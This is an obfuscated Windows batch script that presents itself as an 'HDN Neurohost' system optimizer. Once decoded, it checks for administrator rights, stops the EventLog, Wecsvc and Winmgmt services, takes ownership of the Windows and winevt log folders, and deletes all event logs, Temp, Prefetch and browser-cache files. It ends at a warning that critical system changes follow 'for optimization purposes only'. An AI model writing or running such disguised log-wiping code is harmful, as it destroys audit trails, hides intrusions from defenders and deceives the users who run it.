::obfuscated by https://github.com/rahul
@%DlW%e%HoJJf%c%dn%h%ks%o%RFy% %NDQQRhNRA%o%IIym%f%sybko%f%qJ%
s%JexdhuaWTp%e%Xz%t%dXcKrdc%l%UjtJYf%o%qc%c%PMkfsTT%a%AQMhQKDM%l%NvnO% %HLhpz%E%rYZjLxR%n%XyLBIiMrh%a%nIaPvjL%b%KEA%l%kgFRk%e%CUFMlZoJp%D%IEFcZJVI%e%dHGH%l%jFHMo%a%mOtTTQr%y%KhaE%e%LF%d%jcToJ%E%lWiLc%x%Uk%p%xgNTFZmbCD%a%ujzeENa%n%bVWnB%s%QO%i%RZWuyZ%o%ppTsGcC%n%DvP%

t%SJJxA%i%ySjgOtJ%t%aWpQmpwd%l%fWRpyiORM%e%KdSJ% %wWsV%H%m%D%wcml%N%kdruZwEDvw% %koLraSL%N%Hrv%e%VRIwYWcjG%u%tJosXZHhhm%r%Av%o%LVjbrbHb%h%ToXgs%o%JXANyMP%s%nrphuWrZp%t%HBpqaOdOpx% %HqLKXsGPCq%M%poczAEQ%o%AzbvvL%d%rsg%u%qj%l%yZIG%e%HJZ% %sTJRViJ%-%Q% %GZgawKbnp%C%cZQAFkFCP%l%LRqQa%e%MUqm%a%DEebE%r%PRH% %rqJ%L%hDNIqozZ%o%zwqqjh%g%StMoscHfCj%s%ubgWKrB% %Ur%a%juR%n%hOAuxSs%d%nIUK% %Wh%O%bJJm%p%DWLSqN%t%rhZbQ%i%lOIgMTG%m%Jpcdr%i%sY%z%zSCDrhXZi%e%p% %ItLcaXCtiu%S%LvmMkZGg%y%KwPdailsGI%s%zDuRGPYI%t%uTN%e%uvEkAIfcO%m%BmjJW%
c%R%l%uypync%s%qMcyF%

:: Copyright and Info
:%ch%:%NFYIpH% %ZpVn%C%FzwkaQvDkm%o%uPoy%p%ulMESiwLMx%y%qjMxInKJCz%r%LngYYOsaJq%i%IKShJZKb%g%Yen%h%gofSRR%t%tKu% %PoRlk%a%tZhN%n%KUqh%d%k% %aV%I%LK%n%pKWja%f%tilfqwICA%o%SJ%
e%vPzfOf%c%tvzvwq%h%hirO%o%RwyixZepO% %E%=%YKoLxfk%=%dgtkp%=%ul%=%xyQjd%=%Q%=%ucrh%=%ceqESlar%=%uFfGJa%=%maxQLk%=%qHjSnT%=%whtYcWl%=%AO%=%oqPVopN%=%T%=%cpAOioFiH%=%yrBgb%=%aKz%=%yqWNAx%=%QfDaHF%=%JoODp%=%ROCA%=%ZrWZD%=%EvhBDuAnbO%=%wQqSH%=%U%=%wpDFyd%=%FcpQsYvhWZ%=%Riwjh%=%AZoFlnRS%=%nuLTJkUroQ%=%PBhMlHToM%=%PmHs%
e%a%c%sJnC%h%erWr%o%yxyDugCp% %j% %epd% %RCjhov% %eiWgOa% %EzoNpKvKx% %eUqRpY%H%kVAbJp%D%lWKPoBEPPO%N%hVQhvh% %Mpad%R%sViygG%a%yHiTFRWm%h%ON%u%Bgoewfet%l%hHmKnkEP% %mxcfBkCAC%N%pGCJAQQwSm%e%S%u%YS%r%X%o%NBJDa%h%VSGRjHrql%o%qYXRvWHqG%s%xxfLXWKRz%t%XekmybuPw% %wbYry%M%jbeSCQ%o%pbXZ%d%qjJnDQWGie%u%H%l%g%e%sHNmd%
e%bOpZD%c%lorAlsxsQi%h%RBJVUsOSG%o%IyRYVfD% %Hjtt%=%BKNKBCjmVL%=%QvUkUtk%=%bE%=%GfvBLSO%=%smOSmb%=%LysjQBV%=%wj%=%ntNG%=%MqdMpoSpm%=%Gt%=%TRPzsr%=%WUgdNBPZ%=%mYeBMhq%=%lPNpIpnN%=%KonDFKRZ%=%bwSAZkK%=%Zrq%=%HA%=%ktCCJTBesI%=%UdqeuPfrjz%=%HJkKLJizo%=%TdbRUW%=%tXfNjOgwW%=%CTT%=%u%=%VdlHhquFmH%=%YxGmkHmPoa%=%uLj%=%BeQGvD%=%HGADOPUy%=%qkQ%=%FVmEkdmkzn%
e%MW%c%ai%h%sppznYTiH%o%AkvwUKzUda% %QHsCbHRi%C%yLAxeAtMl%o%IcP%p%CQucpnG%y%ITzjJAWbQH%r%T%i%r%g%urWnI%h%VzIQjW%t%ODrTJFUors% %SVMiKN%(%x%c%kfnkRpevD%)%PPJi% %us%2%Zoo%0%Hf%2%s%5%HCpUrVw% %ekgy%R%xVHrYAVPku%a%lkubeksGz%h%JhKPc%u%YMGGhc%l%xgi%.%KisrTl% %oTBupuE%A%ysxvfaRNR%l%q%l%l% %EDmBjq%R%GsTLlQVs%i%eeOu%g%AIe%h%ZAbsJh%t%FyjLt%s%HjSJis% %UjrIDyFlh%R%EzJ%e%DzAl%s%wqMKs%e%qpDjIRuG%r%enW%v%RpuBxW%e%kiSxUeFkjq%d%iV%.%jYShBKRSdy%
e%ZxxVcSDfOX%c%PBAslBwfr%h%w%o%XPUmd% %HvKF%M%wZJ%a%IjlviaFyD%d%XJQgvS%e%sZ% %ndKfrOioDq%b%hdIdbAspHy%y%qaOT% %ocRbDobhD%R%DKpZUvjuGV%a%umswSfJ%h%BR%u%tBMabON%l%osOd%.%KieGNsbqjQ%
e%p%c%LXABl%h%lUpicBAvl%o%xBjn% %f%=%pr%=%y%=%HiStsMYP%=%uMF%=%eQojtyFmmO%=%VpegeY%=%fGUKpft%=%WW%=%uASLmhPD%=%HzORmCe%=%PfTf%=%pOo%=%rOhRmKQwf%=%zrMGko%=%r%=%yjNUrVdxrB%=%wMsJVh%=%meWi%=%mtCXCkAj%=%GJIcQgEhrQ%=%UMXKHKHdDV%=%XHOJdZqJ%=%ctOGsbpQr%=%jYIamfFu%=%aioEgMYrxy%=%NMSyxk%=%eR%=%xvexabMTWB%=%H%=%Y%=%L%=%oMp%
e%ZinCogJU%c%ZcXZiaq%h%Or%o%BN% %ClsJpKz%P%LHY%l%elmbV%e%oSEdzbHwxm%a%o%s%TmujCVIQwo%e%o% %C%r%v%e%u%a%VnBlT%d%yqlg% %HjecOvyQO%t%jFIWg%h%jI%e%kgz% %d%i%czmACGp%n%GpLTfU%s%qLvsN%t%icKWM%r%HzTaWPltPI%u%VtiK%c%uZvtjJWdv%t%Rzq%i%MNsmvglS%o%kkbcTzeS%n%CNXdVW%s%fvxwMVS% %FGcg%c%y%a%yNdRlS%r%YhXZ%e%wjHmbwRx%f%QqIjRAydDK%u%UYbEOpO%l%rMpM%l%jI%y%v% %Kf%b%vHQLOng%e%Bf%f%CAx%o%RZE%r%NkZYKIbkkw%e%BHpunCbb% %Yz%p%lJHDWR%r%IaBnG%o%egAoEn%c%zWFzoJ%e%udLAUC%e%fY%d%X%i%WpVEx%n%crfDWhKmuI%g%CWFetUxOJ%.%nPOvIT%
e%jDC%c%nZwnEsCYp%h%EmBEiqYam%o%CDsOlNPOV% %vdKj%=%iupRjrw%=%zDtaEASZr%=%SOaTRDq%=%KAUNIOlPTc%=%YLeJkVQ%=%iyKTsarX%=%SSfPmfpMHW%=%CflJ%=%iAzmTBKhe%=%yKn%=%mcJ%=%DqmUpfF%=%islbq%=%s%=%p%=%UFcX%=%g%=%r%=%oduMRjY%=%wjWXElJaS%=%Ex%=%vPnjjd%=%T%=%uRGAB%=%L%=%kuc%=%uGeo%=%WkTDMOFc%=%nVGE%=%gHe%=%s%=%gXacBhffVG%
p%XUNnMn%a%wKRLiY%u%Xvn%s%Xza%e%LH%

:: Ensure script runs as Administrator
:%wlMj%:%nqICfY% %iX%E%LBD%n%FCsEhcCY%s%LgH%u%Nym%r%EbwD%e%LBni% %bKOrjPCxxm%s%jaibvhEU%c%dKKTdJutk%r%vSBEZQtMb%i%zmZFcDJ%p%MzK%t%TqnJOTdp% %OT%r%HChuYOCa%u%d%n%LINp%s%wruqfg% %nenYBEDrPP%a%mqobrKox%s%Fn% %s%A%p%d%WaParjl%m%EwG%i%kTbU%n%zlaPNpR%i%uCcpY%s%SWFEoY%t%UimDKxWYL%r%jUL%a%rBCW%t%aKF%o%NlryTJcfAA%r%qebzNOtl%
N%vWmKiIYQt%E%EL%T%Ch% %jh%S%ImMeP%E%wnFiNbsis%S%MoPEaRDo%S%KKO%I%CSllCc%O%oTLqkMIktP%N%EFrBtxL% %D%>%hP%n%r%u%atmNfspm%l%JXtaxjmiMb% %pLY%2%SxwpIN%>%YcEkWlyw%&%koPgSD%1%kLV%
I%HnYyvghqtp%F%uMts% %UqH%%ERRORLEVEL% %twJBzpYMyz%N%FwK%E%kkoVViuJdR%Q%cZzNOh% %qLz%0%gRsys% %oz%(%thmmqIVNj%
 %KJeHWwt% %RkViVyLhsZ% %fBhTkHgo% %UkBP%e%YFfDC%c%mDJLWBOBXY%h%cPCAK%o%YYCFQnD% %txD%P%Ups%l%OgqMdII%e%X%a%B%s%qtX%e%sIquO% %GFKJ%r%qJUO%u%ryK%n%onM% %JPSjtgG%t%Hw%h%RiQb%i%loFSnUCJnO%s%hxVLubwS% %VUqXxOC%s%lwdLOY%c%vtqIdHoe%r%FRrqmiVdCm%i%rE%p%IDuDpUAN%t%epOR% %oOoPiSfiPA%a%jWZPEYjI%s%FAXzhCIfap% %cx%A%S%d%MsGGspiVXA%m%qGgNsEbD%i%a%n%ZBGklY%i%KLAfq%s%TjFEkwmV%t%AQtJ%r%fs%a%AzuZTxjDDm%t%dKmFccIlBL%o%QkVdHlM%r%TeibOdhGYm%!%RWqyH%
 %em% %xZvBBEsCc% %iGM% %iGNN%p%jrEMezcmWg%a%lL%u%YBl%s%xMxDp%e%fuI%
 %gBWgQK% %bvgoRDoY% %kJudpY% %WOqRNDmqaP%e%RAIAdqV%x%WytVdv%i%igpu%t%BfD%
)%dUhGfFMpGp%

e%g%c%PvyWowQx%h%sKWX%o%NpD% %sVqXjfvW%S%Y%t%MbwOpKN%o%kB%p%kjbwkPNK%p%aIU%i%WUO%n%eNzUVyGbZ%g%ImJLih% %afYBN%W%AzaKBjzjK%i%qRszw%n%nUptwT%d%wVtlP%o%EVCk%w%eHeI%s%t% %UFPUM%L%OPBbPHw%o%cVwnHjboG%g%AD%g%B%i%WOZobWEaX%n%iaSNMlcSBS%g%gj% %gP%S%ryIWbKbHm%e%li%r%Cn%v%EwfvNJLW%i%NnzEzhSqt%c%aQ%e%DNEbA%s%YzctfaVR%.%U%.%iYmKNBbqG%.%CLHg%
n%gvzBtBFGjk%e%iBHwPoGqrt%t%gc% %geC%s%Zx%t%gInBQtRJvG%o%c%p%nBERCPhIp% %kJvVxuGty%"%VsRP%E%hjkUSIPwcU%v%M%e%HLvsmv%n%UmlfGRc%t%qF%L%IJctozeo%o%bjvL%g%EEqOwCXaR%"%stgUqB% %UzbpFGNYU%/%nopmeGLbxr%y%ihkqDnuSD% %bmTP%>%F%n%AC%u%nWa%l%ea% %gamaRXS%2%TDOQhm%>%Af%&%IILgOb%1%GNrw%
n%RrrluOXc%e%uZGlKQmxeU%t%F% %SHggO%s%XRo%t%YEfREqiLTD%o%ApYfQdxu%p%pB% %lwgR%"%aHxB%W%z%e%UJ%c%zIRE%s%Dgz%v%Ovho%c%RDmXbRWF%"%eGlipXwe% %MSSv%/%vzvcu%y%cXivh% %Kbz%>%q%n%KD%u%X%l%vLxhbaU% %HVRc%2%NIjoT%>%sgUeXhsA%&%HcWPYNPz%1%liiyyoMsj%
n%m%e%Eu%t%V% %PPunAzpIpI%s%RRzLa%t%ZdqfOEsWP%o%lJiLJhd%p%fGamxdo% %gYMsWYbD%"%zKQVpWt%W%whMjE%i%z%n%qef%m%xFltEise%g%zw%m%sl%t%Gv%"%IqqlwPSr% %uhotM%/%AWVDJWc%y%CNsSM% %knMWsEj%>%eyTuGWbv%n%xnwvdNehdz%u%PKCMES%l%QzCFcSwkvV% %gvciEuN%2%nkGjbSmNV%>%mza%&%vCPXwANT%1%kaaAq%

e%GvzcMJOO%c%XwvRVc%h%FpuneIprjV%o%u% %eiaWJPDnb%T%tCQNZ%a%D%k%lYj%i%oyJgAckPtP%n%mVRcoFrDlJ%g%wpqQgrAa% %MsNxvQZeaa%O%MKBUUYbX%w%QKTjVeeQIP%n%FcMgiT%e%cXxV%r%ok%s%KUvWAeA%h%UXpAH%i%GpoeqwEB%p%dFtxWWolQ% %A%o%I%f%F% %unHMWbOhy%L%JDOS%o%ptVk%g%fGi% %rEcMQcG%F%oxCG%i%rk%l%UrRsMGa%e%j%s%HaTSdgw%.%Zc%.%agdgUgMWH%.%BDU%
t%tlKpZyexiQ%a%sFdcjKbIf%k%geh%e%NbrNiQ%o%SutpmdSHV%w%qcQNkrzDL%n%qGgVNkx% %JZdG%/%zT%f%ixsIBkwwfz% %Zy%"%Anlp%%WinDir%\%CVLZ%L%yeoJOq%o%LIzUM%g%wNIh%s%RngWyndya%"%izGXV% %x%/%jRo%r%UOPSmMQShD% %gzHz%/%aOj%d%TfxieBRy% %ODrOCGQlW%y%Qo% %IFR%>%MVEYb%n%eUJkLZSGpL%u%cfC%l%GhwbWbCxu% %rgHBVCcips%2%Zqg%>%kGN%&%qp%1%mitd%
icacls "%WinDir%\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%VR%c%HIsQgAyIJx%a%hI%c%O%l%Z%s%LkqvPH% %vnJNACEB%"%HA%%WinDir%\%T%L%Duxbv%o%GAbqlRmr%g%Rxgu%s%lhlbAU%"%LxjAp% %iBcqxRzZI%/%MEv%g%iWoiU%r%XsTeAQqkp%a%iflKvDkp%n%GoRvTf%t%X% %DoC%A%vXmPIU%d%p%m%AsTeYzRVA%i%NfuMN%n%wNQ%i%UNurrZGU%s%MMgUhxjxgX%t%OTZkjB%r%TAPDhrCWSY%a%ccNUkOyk%t%Hp%o%usBnaEL%r%qDSI%s%HWKpCcxU%:%SzhmoySsGf%F%KuQyZ% %ntebGmU%/%w%t%BfKkVDjTp% %ZEDoSCfvc%/%lidZcz%c%ReBbxywXNf% %iZvinmc%/%ZUdlTn%q%r% %TMODfYftnc%>%aqv%n%z%u%t%l%NXwUk% %ZVd%2%fWAlRfBUDt%>%NqRcW%&%qnS%1%GIqbvjmXs%
t%pbMaGKKf%a%GCM%k%tN%e%TIKxSfOaw%o%UkpTYNyey%w%P%n%YYUGriG% %RwMzmwjvy%/%GqKn%f%pP% %zakJHbILvN%"%jZ%%SystemRoot%\%EHhX%S%dhIZg%y%fwAzAZGu%s%Q%t%B%e%XSCU%m%KB%3%xXvhWdYb%2%b%\%XcPBR%w%kTLTqzv%i%ogIGSZl%n%Z%e%vFbDofwouB%v%h%t%Wzfv%\%H%L%OGSGNk%o%IiHJ%g%KC%s%qbW%"%UJA% %qhoIc%/%fDKF%r%xUxvCHOO% %OxN%/%nIeGIhz%d%QLwJty% %BLi%y%eXNQfeiCo% %oBFXUyff%>%NQdmXDFjW%n%WnIRW%u%FLlLRGwpPM%l%NeMckMMw% %pWOBFAHuUA%2%rvnzQU%>%aBUQ%&%EIIp%1%ceQOFEPTM%
icacls "%SystemRoot%\System32\winevt\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%YKNrWZD%c%ACKni%a%qekoVc%c%FlUqjFbQ%l%PXaxs%s%FVWIn% %HD%"%sxtaW%%SystemRoot%\%abMI%S%EBKX%y%LtwptNDLH%s%ZrEjPQ%t%fjUZReL%e%jYbIfOPo%m%iRPWzWpVm%3%DeCcYMlU%2%RGVe%\%ehrGep%w%ihAYI%i%mD%n%lIL%e%HQdvrOG%v%YhTYlfej%t%kAedry%\%YWEaJ%L%yYSUTnv%o%kr%g%LvIdKLvN%s%fzznKr%"%GUveWyRKye% %XBMY%/%CkNVjaVY%g%sLZezu%r%wSiiFSQA%a%nSQVi%n%mIbcz%t%iiDKlaMSt% %i%A%NNLiSCbc%d%WTkt%m%GGqeWjqn%i%K%n%bCVZ%i%zAbkww%s%aGLadkTVr%t%Wvey%r%oltNswr%a%rSHflg%t%EDqLD%o%Tt%r%N%s%EQmpRuHda%:%HyM%F%BKLzfblg% %pmhj%/%iSlapT%t%ioLJdCy% %SgsYBZtfhV%/%X%c%tlaB% %BGUdTDdGtr%/%y%q%Uq% %caNp%>%rXEPYx%n%kBiDfUy%u%AmHBTvOhtC%l%GJMhEf% %zPNjKJr%2%XJX%>%jqLyH%&%JNDKfJwAer%1%agI%

e%uoquANoE%c%m%h%D%o%TUHiT% %EhDkrfjWqi%D%gL%e%eIl%l%V%e%pzZK%t%f%i%UvMSlMP%n%YIbBMiSX%g%OjW% %MnOLhCj%A%aroyvz%L%IZIXpeg%L%mykkYbZeX% %tKMANIMZRr%L%MSfdIIdlc%o%EyzlmMJor%g%dSUntoyxX%s%HOKJxT% %dGqyn%(%klokwCQn%T%FhyuRcs%h%pcgTqLGDoH%i%TmQUy%s%XzYI% %XyKB%i%CgdCiOapT%s%mYpyWN% %aornffNx%a%qvhw% %jZqzHlTz%p%q%r%rcCZJZTyf%e%XYtcXdoin%-%d%s%c%t%XeQX%e%SirjrsSPM%p%Hf%,%MVhMEkbky% %CUCiwwghvy%c%JuZNtIxoTr%l%uB%e%IpMz%a%ycPk%n%yOzsqK%u%tVzqZAvcqu%p%K% %xp%a%wctBLziP%f%PEp%t%QPW%e%yGpki%r%a% %WjwFuSYcQ%p%OUuBJJSeP%r%jOYGQTH%o%sNafWa%c%HZsDdUcA%e%Soew%s%BXSwPOcfto%s%QOLNfzFPg% %jwXFRj%w%SCV%i%aThjMeIdeF%l%IEe%l%PZ% %wrpJdVs%h%hXxaj%a%fBFJwBXt%p%TZbhAkVoFw%p%GSTa%e%LIQgn%n%umtFcuYY% %Z%l%CmUBVCCzf%a%gRhAOLt%t%eWjHnkupQp%e%usi%r%QNxRYKyMrk%)%xfC%.%OsGWvxzJfC%.%Im%.%OcwFoNHdWf%
:: Deleting logs (temporary, to clear any existing logs that might be relevant before starting the optimization process)
:%KRThYaZw%:%SrjOgYfyqZ% %fj%D%meC%e%brLLH%l%XqzpSCNUaC%e%edV%t%vMmlbySB%i%qPAreH%n%sFEGWoD%g%dqVN% %AyHFRNhq%l%sjqWvQZSJK%o%tRMwJpHo%g%y%s%mEENnps% %IyEwSlJp%(%EA%t%xUOL%e%A%m%n%p%QxPajEVvd%o%qMBBCZIiH%r%IHlUimk%a%V%r%VBS%y%b%,%jaqjmfAj% %qgindvruW%t%PSh%o%QsTvvBjNvZ% %EAAQsP%c%tyCNJ%l%coCJCDSk%e%Re%a%U%r%srLJBITiJT% %vo%a%zCVxH%n%wvjBgUTxSu%y%SG% %URGYJ%e%p%x%b%i%LkwkuwEn%s%sVtcLAct%t%klTy%i%JyxLbx%n%pzLRXp%g%YjhRYCSwqI% %PiZYM%l%H%o%luXFJG%g%UChFBiunl%s%udUojZSw% %Oa%t%MfzcSzs%h%WCggnJeVtV%a%vEcBUbTsk%t%qBMHFeKse% %EcGO%m%oQUXsKx%i%HIFXa%g%wjZA%h%gHQ%t%Vfc% %WL%b%rceCvG%e%CpGPBqKt% %Wtlqt%r%igaEnyasu%e%hcKm%l%ehVgv%e%z%v%IPyqgNbnY%a%LwFHWk%n%dcc%t%tBVL% %V%b%KxSucicqf%e%RNMVGSh%f%w%o%uEqW%r%iipFUED%e%J% %cV%s%kV%t%fz%a%qDdRJmJw%r%rpA%t%G%i%gDgiflS%n%d%g%K% %YXzmEh%t%iiytai%h%oU%e%JXHJVCC% %NHawigj%o%PTuZVagfSO%p%K%t%ru%i%iD%m%zD%i%rP%z%labuUQ%a%kQRQYBz%t%wW%i%LGA%o%ijPf%n%OWGbgBYJQ% %czbiLda%p%hprHhLCitZ%r%kyTJ%o%efPt%c%zCJRZrq%e%vbYE%s%gwz%s%uhXdy%)%uuGcJNfB%
d%kzhxwoC%e%S%l%f% %KOm%/%kguF%s%aZEGq% %AYkEJk%/%RiO%f%OsmtXvfz% %cifZ%/%rmwBbg%q%Uh% %Rzb%"%U%%WinDir%\%QEYzWq%L%mgDMxfiRJK%o%bruFElSeY%g%URAayGgmE%s%aCXCHJ%\%WxkdBLIwq%*%loxdpKklrz%"%L% %ua%>%tHohZQ%n%GtDseI%u%SnkDUatPC%l%ZA% %sDSGVKXTz%2%Mp%>%MMCjzgoZ%&%KdZknvSXMq%1%RKmnYCEjdU%
d%YdppMQHT%e%pqCBHhlYIK%l%gQkjQ% %ExLDNeiCKp%/%ymgl%s%vWLlNivy% %rZRHukrurG%/%w%f%OaSayzF% %acUXJQN%/%ZGRsN%q%btniIl% %K%"%ekDJMTWRgT%%SystemRoot%\%as%S%Y%y%lM%s%ObZHA%t%l%e%FYZM%m%q%3%x%2%KKc%\%N%w%rkqCPQCv%i%YfsaszXMPb%n%BXjHjqSco%e%Tjv%v%ufJM%t%TptczAmX%\%PEraVl%L%gNe%o%dOfgc%g%vLYbQlFGh%s%QE%\%mHmRKX%*%ZhKklKxMad%"%FvjtQpuOoZ% %atfBCYUia%>%JezbW%n%aWDE%u%uaBvBqgGJo%l%zk% %UYryNNuQ%2%DyYpchotyT%>%YEiDAC%&%tknmPwxT%1%RNf%
d%IQDyoFx%e%sUnealnL%l%y% %jvRV%/%VIg%s%MLBjMxzRU% %nCeQZF%/%oaHQ%f%oA% %LkifVYTa%/%aEGcKMIm%q%qyhTiKy% %GPk%"%swgyX%%LocalAppData%\%Gjc%T%nw%e%iibk%m%mPg%p%BOB%\%B%*%QGg%"%DSeka% %VL%>%na%n%iuOYFHcm%u%fAddQgjqd%l%OauY% %JjNPb%2%iiXMXxO%>%MUZul%&%jZSrS%1%lliOZjymwB%
d%OvLiiAv%e%dLnG%l%Q% %ZodpAaJ%/%dGkrbxWJ%s%MMrze% %HfbSuL%/%mJiKIzKxY%f%KtZ% %qShS%/%DyUJ%q%DIMD% %lKgJE%"%PG%%Temp%\%Dx%*%kG%"%krpINB% %DPWQptQT%>%rneCyLt%n%zDZjefWf%u%IDyjN%l%cZBfAk% %iH%2%RJKcfDSX%>%AoehyU%&%PAxCHfmR%1%DVSE%
d%tgWVa%e%RXNKWrMm%l%rQKtRtZLb% %SymT%/%xndyyEoFkw%s%DrMscvcSag% %Jntqrm%/%TJmfYbSSN%f%PxHAyjb% %smqMJ%/%YWMbTy%q%ZXCdf% %yMIUg%"%Uoes%%WinDir%\%sTSMqJgnP%T%a%e%u%m%miKEXZ%p%Pzll%\%uMCltsuZgO%*%x%"%OUNF% %uStNGl%>%xRWaSdp%n%bJSktH%u%DRRk%l%Mm% %gcKVJwa%2%StR%>%qFfI%&%wKXOJ%1%TpndmWskO%
d%yGEe%e%xzfTlGmFY%l%uREkXrap% %YXupYMj%/%YwlB%s%HaXnKc% %tH%/%RLeuIMBBtO%f%qih% %WfjcjvprCy%/%gzrg%q%ZZr% %dF%"%URpXwvTUnT%%SystemRoot%\%OkhEKyc%P%xJBG%r%YQ%e%X%f%ezrkHH%e%yg%t%B%c%bNzpngnkZ%h%skkam%\%gtqDqW%*%FIZuoVa%"%UcPbfTAZV% %y%>%Wor%n%u%u%RYf%l%oybkM% %ul%2%UQkWuPdg%>%vvdeGMYPw%&%xKUqeL%1%Wnw%
d%EF%e%PhpYyqWhsw%l%fkNRLQH% %EeBdusWF%/%LrrNxnD%s%mrE% %IVKVF%/%SdWJppStd%f%XihQVoqplL% %tIqJn%/%bpj%q%TADnKfVFJx% %d%"%mFkncCiLZC%%LocalAppData%\%VrtKQIK%M%lIE%i%Oao%c%BoM%r%vGACUMKES%o%kZSLnt%s%pvJUAA%o%WQ%f%AcSGlm%t%zbEwSTVSA%\%QNhXDdQEp%W%X%i%z%n%oCMxo%d%gZcsvvMpfm%o%jw%w%GDggTjjsR%s%rJULBIZg%\%eO%I%xj%N%gvbTJHCigp%e%qlvnwjBhRq%t%fxN%C%htAGU%a%nhSLKt%c%j%h%PyWTyWzRVr%e%wyukBi%\%lgeq%*%kbOBie%"%JXGQrgnZ% %iOc%>%recKrRxD%n%NGHEtwiEdF%u%LkvA%l%bkaJL% %m%2%uUPRxXwRH%>%dgAMK%&%dDvhEFaIy%1%I%

:: Main Menu
:%qCrETD%:%iXr% %bHWCGIdvoz%M%xFpQja%a%RM%i%NJHva%n%T% %zGe%M%dNoi%e%YUBnfTOQoF%n%EKGjlmDY%u%bk%
c%rtyFvNcwRR%l%DlYlai%s%s%
e%rkFNbrGfZk%c%NcMlmvmmp%h%Op%o%kfK% %xEfDpWCcEu%=%PXm%=%coA%=%Cfsnpys%=%TDnMmj%=%ORQ%=%eDHRfjlmk%=%UoolVve%=%dZmayCO%=%yITuqcQAX%=%XCiyVasj%=%SvfnZDjiJM%=%SlZjgeeug%=%WFsBmarg%=%ucqUQnOIl%=%tjbKcOpr%=%HFQzSxAN%=%ryKwACOD%=%uxhCKJ%=%mj%=%CKjOJd%=%vtB%=%ovoNszJbSb%=%rjhbT%=%a%=%AqEMOfAwFR%=%iWHAtCSsm%=%aXm%=%spIdEJ%=%qxbqVg%=%Zijo%=%dKuvT%=%oWiuMXQ%
e%YvcmPaGV%c%CCUYhdPYZy%h%DAkMOjQu%o%DlbxotAn% %IQhTWWvzq% %MSfmHDj% %tlzQbztY% %UyNMe% %N% %upPGZLVf% %ln%H%HMWFjSXC%D%yemKNB%N%CPo% %BoSovXtARF%N%sEX%e%pIkBqi%u%g%r%RPwJVnE%o%SIQj%h%pJerRikUg%o%Arusp%s%GChiC%t%FuZojj% %nG%M%lfWayqeqR%o%RkXwiB%d%XIBdPG%u%rcBe%l%mydHSFmxv%e%jUETKiI%
e%ZrCGRew%c%QdyRjpzY%h%kTNjxxuaS%o%oOg% %ezvyIbSjL%=%oUyLKhmU%=%Ky%=%cKtexgNe%=%PUjfpRZT%=%xfawrcQL%=%zoDwbg%=%PqNpok%=%rGXWmxmBmz%=%ApqwGpSCFk%=%Vvcgb%=%lPyO%=%AtbW%=%ZXq%=%XlWKy%=%aOUQE%=%CjFFVNr%=%xspiBy%=%rAZyMbItBM%=%MCEO%=%fbsltzcY%=%DzVr%=%sCkS%=%JkUwZ%=%Ol%=%PA%=%Gq%=%Vat%=%u%=%QFjgfQqIBd%=%vbLRU%=%OGKIXPm%=%iZrbibo%
echo WARNING: Optimization process will now apply critical system-level changes!
e%v%c%KExVLta%h%dcd%o%VALbhSRCZg% %qkEnjR%W%Eijagxs%A%TrJeTqgU%R%f%N%B%I%eyvlCwRE%N%U%G%vvYimnjjAy%:%PdKq% %BEiAkQc%O%aucNQROu%p%yHrYhBFf%t%dswmC%i%NPXZxExC%m%pkd%i%ebsHDvYoFg%z%iLkAoIS%a%eJG%t%pZJc%i%qiUhAXb%o%OGfug%n%RsQtswb% %RU%p%wYl%r%IztWtic%o%tmcKi%c%CCn%e%G%s%rhDg%s%jfbdGDoAzy% %AVqza%w%hxFAnyhdLN%i%LvY%l%rhBXiohmI%l%jpovn% %VuWpYBbqaj%n%cvJBGs%o%PyeFmdzZ%w%NfOKsj% %DFqhqMJIq%a%Xqbm%p%neQoKNOYsT%p%qMDjNO%l%AlnlCjMu%y%gWh% %VvM%c%cElEhs%r%yqGAeN%i%TQHzPYV%t%VawHOfdk%i%HjpFzMH%c%vv%a%vqQIcpaszZ%l%wWLTK% %egjuqVYiG%s%FpGFx%y%MOZonI%s%gxPeWTPqY%t%tPkNkNJPQY%e%WFOWxXlqTZ%m%E%-%iMyUKx%l%nhf%e%zlHG%v%WeOunjr%e%R%l%PMfYT% %bCcsYwLepH%c%e%h%DJEcKH%a%ZFsaidbUC%n%pMlCC%g%DiInPS%e%uzdmFu%s%FETvY%!%znlnXNlQ%
e%fLRO%c%relJSu%h%QmTKZdOe%o%XOFRcKo% %ewug%D%zmyTWBpeEN%o%IaKfLkjN% %ENJleZNnx%n%ceqW%o%pNDS%t%DkrthCS% %RJXPIBsbA%i%Cv%n%FBDF%t%vogExBHefl%e%FCWOp%r%zcRQQTiuJQ%r%lTazfQ%u%GfdKCC%p%CTJIQZuQ%t%WAatZP% %f%t%twJMlpgm%h%krRYktUpG%e%qaEMTZhXX% %hEg%p%bxOPw%r%yfCsYcLAI%o%DGyiD%c%hNEbSn%e%gBid%s%ScDKKAWH%s%zixOMMAo%.%SoBbn% %tOEFFqd%T%CA%h%tjYwE%i%WoaGiT%s%xZOTEYHYCQ% %J%i%VfSN%s%lUPnISs% %nTbmmcLuF%f%ibVPtf%o%eoRLsK%r%JRBTfTLrG% %BthaJppjKv%o%zHSpte%p%HiiYgHUDl%t%pIk%i%EZEBOH%m%SFVK%i%fGIIqN%z%wqJtXYMgc%a%qRrkOoe%t%lbZMYwJSzu%i%MDdScV%o%IdbMCyFNP%n%pV% %NC%p%TBH%u%akkPW%r%H%p%eiGR%o%QecOlxDWhr%s%EH%e%xSyHo%s%qxsRMC% %MD%o%NnQES%n%i%l%DVGjzROt%y%QEexdFTr%.%BY%
e%QTvivWQin%c%DttIcf%h%XElkKpohME%o%mf% %pLjayl%=%icahAHlJf%=%LfUCGVGHo%=%v%=%EgfR%=%UZkHaaLU%=%G%=%XLrdOrJtPn%=%vl%=%lY%=%WzbfWN%=%jpgVaDkUkJ%=%J%=%CeOfCi%=%ntpdS%=%gerI%=%miP%=%oboRiyX%=%DIYvPZOq%=%p%=%EPcwz%=%PdDOd%=%nUSD%=%iS%=%EPc%=%Cwo%=%jweebbv%=%kBGmzfdgvB%=%feNNcPSe%=%MJ%=%jeB%=%etChXxZvB%=%W%
